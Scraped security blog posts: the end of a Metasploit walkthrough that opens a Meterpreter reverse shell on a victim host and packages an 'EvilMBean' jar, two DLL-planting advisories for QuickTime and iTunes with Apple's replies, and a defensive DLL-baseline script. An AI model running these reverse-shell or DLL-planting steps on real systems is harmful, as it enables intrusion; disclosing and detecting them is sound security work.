<span style="font-family: Courier New, Courier, monospace;">Module options (exploit/multi/handler):</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Name Current Setting Required Description</span><br />
<span style="font-family: Courier New, Courier, monospace;"> ---- --------------- -------- -----------</span><br />
<span style="font-family: Courier New, Courier, monospace;">Payload options (java/meterpreter/reverse_tcp):</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Name Current Setting Required Description</span><br />
<span style="font-family: Courier New, Courier, monospace;"> ---- --------------- -------- -----------</span><br />
<span style="font-family: Courier New, Courier, monospace;"> LHOST 1.1.1.32 yes The listen address</span><br />
<span style="font-family: Courier New, Courier, monospace;"> LPORT 8888 yes The listen port</span><br />
<span style="font-family: Courier New, Courier, monospace;">Exploit target:</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Id Name</span><br />
<span style="font-family: Courier New, Courier, monospace;"> -- ----</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0 Wildcard Target</span><br />
<span style="color: #cc0000;">msf exploit(handler) > exploit</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Started reverse handler on 1.1.1.32:8888</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Starting the payload handler...</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Sending stage (30355 bytes) to 1.1.1.40</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Meterpreter session 1 opened (1.1.1.32:8888 -> 1.1.1.40:33457) at 2015-02-15 17:49:04 -0500</span><br />
<br />
Post-exploitation commands:<br />
<span style="color: #cc0000;">meterpreter > sysinfo</span><br />
Computer : victim<br />
OS : Linux 3.13.0-32-generic (amd64)<br />
Meterpreter : java/java<br />
<span style="color: #cc0000;">meterpreter > pwd</span><br />
/tmp<br />
<br />
Creating a jar file from a class file:<br />
<span style="color: #cc0000;">root@kali-ucs:~/rmx_remote# jar cvf compromise.jar EvilMBean.class</span><br />
added manifest<br />
adding: EvilMBean.class(in = 172) (out= 134)(deflated 22%)<br />
<div>
<br /></div>
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com1tag:blogger.com,1999:blog-1852980805947568568.post-30007963646625728722015-02-14T19:30:00.002+05:302015-02-14T19:30:41.293+05:30Apple QuickTimePlayer Insecure DLL Loading Code ExecutionBy default the QuickTimePlayer installation doesn't ship with CoreFoundation.dll, but QuickTime Player tries to load that DLL when started.<br />
<br />
Create any malicious DLL, rename it to CoreFoundation.dll and copy it to C:\Program Files (x86)\QuickTime\<br />
<br />
After copying the DLL, starting QuickTimePlayer executes the code in the malicious DLL, leading to DLL injection.<br />
<br />
Location: C:\Program Files (x86)\QuickTime\CoreFoundation.dll<br />
Application: QuickTime 7.7.2<br />
OS: Windows 7 Ultimate N SP1<br />
<br />
Apple's response:<br />
<i>After examining your report we do not see any actual security implications. </i><br />
<i> Writing a file to the C:\Program Files (x86)\QuickTime directory requires local </i><br />
<i> administrative privileges.</i><br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-60706942007904968672015-02-14T19:28:00.001+05:302015-02-14T19:29:07.537+05:30Apple iTunes Insecure DLL Loading Code ExecutionBy default the iTunes installation doesn't ship with dwmapi.dll, but iTunes tries to load that DLL when started.<br />
<br />
Create any malicious DLL, rename it to dwmapi.dll and copy it to C:\Program Files (x86)\iTunes\<br />
<br />
After copying the DLL, starting iTunes executes the code in the malicious DLL, leading to DLL injection.<br />
<br />
Location: C:\Program Files (x86)\iTunes\dwmapi.dll<br />
Application: iTunes 12.0.1.26<br />
OS: Windows 7 Ultimate N SP1<br />
<br />
Apple's response:<br />
<i>After examining your report we do not see any actual security implications. </i><br />
<i> Writing a file to the C:\Program Files (x86)\iTunes directory requires local </i><br />
<i> administrative privileges.</i><br />
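Both this post and the QuickTime one above describe the same condition: a DLL the application asks for is absent from its install directory, so a file dropped there under that name is loaded at start-up. Apple's point is that dropping the file needs administrative rights; a defender who wants to notice when it happens anyway can baseline the DLLs of a clean install and diff against it later. The script below is an added example, not part of either advisory; the directory, file names and file contents are constructed placeholders created in a temporary directory so it runs anywhere.

```python
import hashlib
import tempfile
from pathlib import Path


def dll_hashes(app_dir):
    """SHA-256 of every .dll directly inside app_dir, keyed by lower-cased
    name (Windows file names are case-insensitive)."""
    hashes = {}
    for path in sorted(Path(app_dir).iterdir()):
        if path.is_file() and path.suffix.lower() == ".dll":
            hashes[path.name.lower()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return hashes


def audit_app_dir(app_dir, baseline):
    """Compare the DLLs present now with a baseline taken from a clean install.
    'planted' = a DLL the application did not ship with; if its name is one the
    application tries to load (CoreFoundation.dll, dwmapi.dll in the posts
    above) it will be picked up at the next start."""
    current = dll_hashes(app_dir)
    return {
        "planted": sorted(n for n in current if n not in baseline),
        "modified": sorted(n for n in current if n in baseline and current[n] != baseline[n]),
        "missing": sorted(n for n in baseline if n not in current),
    }


def demo():
    """Constructed scenario: two placeholder DLLs are baselined, then a
    CoreFoundation.dll appears and one shipped DLL changes."""
    with tempfile.TemporaryDirectory() as tmp:
        app = Path(tmp) / "QuickTime"  # stands in for C:\Program Files (x86)\QuickTime
        app.mkdir()
        (app / "example1.dll").write_bytes(b"placeholder bytes, not a real DLL")
        (app / "example2.dll").write_bytes(b"placeholder bytes, not a real DLL")
        baseline = dll_hashes(app)
        (app / "CoreFoundation.dll").write_bytes(b"unexpected file dropped later")
        (app / "example2.dll").write_bytes(b"contents changed after baseline")
        return audit_app_dir(app, baseline)


if __name__ == "__main__":
    print(demo())
```

In use, dll_hashes() would be run once against the real install directory right after installation and the result stored (for example as JSON) somewhere the application's directory cannot write to, and audit_app_dir() run on a schedule; anything in "planted" with the name of a library the application is known to look for is worth treating as an incident rather than a curiosity.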
<i><br /></i>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0